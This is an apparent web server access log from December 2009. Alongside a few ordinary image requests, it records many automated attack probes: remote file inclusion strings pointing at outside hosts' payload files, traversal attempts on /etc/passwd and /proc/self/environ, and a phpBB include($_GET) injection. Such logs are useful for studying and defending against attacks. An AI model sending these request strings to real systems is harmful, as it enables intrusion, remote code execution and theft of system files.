72.199.239.79 - - [13/Dec/2009:09:09:06 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.3.1106.427; Windows XP 5.1; MSIE 7.0.5730.13)" "www.dmulk.com"
72.199.239.79 - - [13/Dec/2009:09:09:07 -0800] "GET /megumi/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.3.1106.427; Windows XP 5.1; MSIE 7.0.5730.13)" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:09:10:06 -0800] "GET /logs/access_090510.log/index.php?menu=deti&page=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:09:10:06 -0800] "GET /logs/access_080607.log/index.php?menu=deti&page=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:09:10:11 -0800] "GET /logs/access_090510.log/index.php?menu=deti&page=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:09:10:11 -0800] "GET /logs/access_080607.log/index.php?menu=deti&page=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [13/Dec/2009:09:10:25 -0800] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr//xe/common/den/pinkid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:10:26 -0800] "GET /logs//errors.php?error=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:10:26 -0800] "GET /errors.php?error=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:10:26 -0800] "GET /logs/access_090128.log%20%20//errors.php?error=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:10:40 -0800] "GET /errors.php?error=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:10:40 -0800] "GET /logs//errors.php?error=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:10:40 -0800] "GET /logs/access_090128.log%20%20//errors.php?error=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:10:41 -0800] "GET /logs/access_080529.log%20%20//errors.php?error=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:10:51 -0800] "GET /logs/access_080529.log%20%20//errors.php?error=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.219.58.34 - - [13/Dec/2009:09:11:04 -0800] "GET /logs/access_080802.log HTTP/1.1" 200 131072 "-" "MLBot (www.metadatalabs.com/mlbot)" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:09:13:01 -0800] "GET /logs/access_091004.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:09:13:01 -0800] "GET /logs/access_090727.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:09:13:01 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:09:13:03 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 14953 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:09:13:06 -0800] "GET /logs/access_091004.log///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:09:13:06 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 14952 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:09:13:06 -0800] "GET /logs/access_090727.log///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:09:13:06 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:13:11 -0800] "GET /logs/access_080427.log//?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:13:12 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 14980 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:13:13 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 130053 "-" "libwww-perl/5.79" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:09:13:25 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 14952 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:09:13:25 -0800] "GET /logs/access_090727.log///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:09:13:25 -0800] "GET /logs/access_091004.log///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:09:13:25 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:09:14:35 -0800] "GET /logs/access_080321.log//page.php?id=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:09:14:35 -0800] "GET /page.php?id=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:09:14:35 -0800] "GET /logs/access_080321.log//page.php?id=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:09:14:35 -0800] "GET /page.php?id=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:09:14:35 -0800] "GET /logs/access_080321.log//page.php?id=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:09:14:35 -0800] "GET /page.php?id=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:09:14:35 -0800] "GET /logs/access_080321.log/errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:09:14:35 -0800] "GET /errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
61.66.28.36 - - [13/Dec/2009:09:14:47 -0800] "GET /logs/access_091203.log///include/mail.inc.php?skin_board_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [13/Dec/2009:09:14:47 -0800] "GET //include/mail.inc.php?skin_board_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [13/Dec/2009:09:14:47 -0800] "GET /logs///include/mail.inc.php?skin_board_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.109.163.37 - - [13/Dec/2009:09:15:05 -0800] "GET /bikes/2k6klr650/klr006.JPG HTTP/1.1" 200 109371 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.dmulk.com"
69.109.163.37 - - [13/Dec/2009:09:15:05 -0800] "GET /bikes/2k6klr650/klr005.JPG HTTP/1.1" 200 98538 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.dmulk.com"
69.109.163.37 - - [13/Dec/2009:09:15:05 -0800] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.1" 200 216057 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.dmulk.com"
69.109.163.37 - - [13/Dec/2009:09:15:06 -0800] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.dmulk.com"
69.109.163.37 - - [13/Dec/2009:09:15:06 -0800] "GET /bikes/2k6klr650/klr002.JPG HTTP/1.1" 200 287373 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.dmulk.com"
69.109.163.37 - - [13/Dec/2009:09:15:06 -0800] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 200 325181 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "www.dmulk.com"
61.66.28.36 - - [13/Dec/2009:09:16:21 -0800] "GET /logs///include/mail.inc.php?skin_board_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [13/Dec/2009:09:16:21 -0800] "GET //include/mail.inc.php?skin_board_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [13/Dec/2009:09:16:21 -0800] "GET /logs/access_091029.log%20%20///include/mail.inc.php?skin_board_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [13/Dec/2009:09:16:25 -0800] "GET /logs/access_090712.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [13/Dec/2009:09:16:25 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [13/Dec/2009:09:16:25 -0800] "GET /logs/access_090930.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [13/Dec/2009:09:16:25 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:16:31 -0800] "GET /logs/access_090128.log//errors.php?error=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:16:41 -0800] "GET /logs/access_080529.log//errors.php?error=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:16:53 -0800] "GET /logs/access_090130.log/?htmlclass_path=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:16:53 -0800] "GET /logs/?htmlclass_path=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 200 130075 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:16:55 -0800] "GET /?htmlclass_path=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 200 14955 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:16:59 -0800] "GET /logs/access_090130.log/?htmlclass_path=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:16:59 -0800] "GET /logs/?htmlclass_path=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 200 130075 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:16:59 -0800] "GET /?htmlclass_path=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 200 14954 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:17:00 -0800] "GET /logs/access_090128.log//errors.php?error=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:17:03 -0800] "GET /logs/access_080529.log//errors.php?error=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:17:32 -0800] "GET /logs/access_080710.log/?htmlclass_path=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:17:35 -0800] "GET /logs/access_080710.log/?htmlclass_path=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.225.13 - - [13/Dec/2009:09:17:47 -0800] "GET /logs/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.225.13 - - [13/Dec/2009:09:17:47 -0800] "GET /logs/access_090213.log/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.225.13 - - [13/Dec/2009:09:17:47 -0800] "GET /bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:09:18:03 -0800] "GET /logs/access_090213.log/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:09:18:03 -0800] "GET /bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:09:18:03 -0800] "GET /logs/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.225.106.11 - - [13/Dec/2009:09:18:30 -0800] "GET /bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.225.106.11 - - [13/Dec/2009:09:18:30 -0800] "GET /logs/access_090213.log/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.225.106.11 - - [13/Dec/2009:09:18:30 -0800] "GET /logs/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.86.34.18 - - [13/Dec/2009:09:19:05 -0800] "GET /bbshop/shop/index.php?page=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.86.34.18 - - [13/Dec/2009:09:19:05 -0800] "GET /logs/access_090213.log/bbshop/shop/index.php?page=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.86.34.18 - - [13/Dec/2009:09:19:05 -0800] "GET /logs/bbshop/shop/index.php?page=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:19:36 -0800] "GET /logs/access_090130.log%20%20/?htmlclass_path=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:19:54 -0800] "GET /logs/access_080710.log%20%20/?htmlclass_path=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:19:59 -0800] "GET /logs/access_090930.log//?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:20:08 -0800] "GET /logs/access_080427.log/////////?cmd&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:20:09 -0800] "GET ////////?cmd&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 14967 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:20:10 -0800] "GET /logs/////////?cmd&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 130087 "-" "libwww-perl/5.79" "www.dmulk.com"
174.120.225.13 - - [13/Dec/2009:09:20:26 -0800] "GET /logs/access_090213.log%20%20/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:20:38 -0800] "GET /logs/access_080427.log/////?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:20:39 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 14980 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:20:40 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 130083 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.34.18 - - [13/Dec/2009:09:20:44 -0800] "GET /logs/access_090213.log%20%20/bbshop/shop/index.php?page=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:09:20:46 -0800] "GET /logs/access_090213.log%20%20/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:20:55 -0800] "GET /logs/access_090130.log%20%20/?htmlclass_path=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:09:20:57 -0800] "GET /logs/access_080710.log%20%20/?htmlclass_path=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.175.235.72 - - [13/Dec/2009:09:21:07 -0800] "GET /logs/access_090213.log/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.175.235.72 - - [13/Dec/2009:09:21:07 -0800] "GET /bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.175.235.72 - - [13/Dec/2009:09:21:07 -0800] "GET /logs/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.225.13 - - [13/Dec/2009:09:21:12 -0800] "GET /logs/access_091021.log%20%20/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.86.34.18 - - [13/Dec/2009:09:21:30 -0800] "GET /logs/access_091021.log%20%20/bbshop/shop/index.php?page=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:09:21:51 -0800] "GET /logs/access_091021.log%20%20/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.225.106.11 - - [13/Dec/2009:09:22:09 -0800] "GET /logs/access_090213.log%20%20/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
146.164.54.5 - - [13/Dec/2009:09:22:22 -0800] "GET /logs/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
146.164.54.5 - - [13/Dec/2009:09:22:22 -0800] "GET /bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
146.164.54.5 - - [13/Dec/2009:09:22:22 -0800] "GET /logs/access_090213.log/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:09:22:43 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:09:22:45 -0800] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:09:22:54 -0800] "GET /logs/access_090516.log%20%20/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.225.106.11 - - [13/Dec/2009:09:22:57 -0800] "GET /logs/access_091021.log%20%20/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:09:23:03 -0800] "GET /logs/access_080410.log%20%20/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:09:23:10 -0800] "GET /logs/access_090516.log%20%20/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:09:23:12 -0800] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:09:23:12 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:09:23:21 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:09:23:22 -0800] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:09:23:22 -0800] "GET /logs/access_080410.log%20%20/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:09:23:29 -0800] "GET /logs/access_090516.log%20%20/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
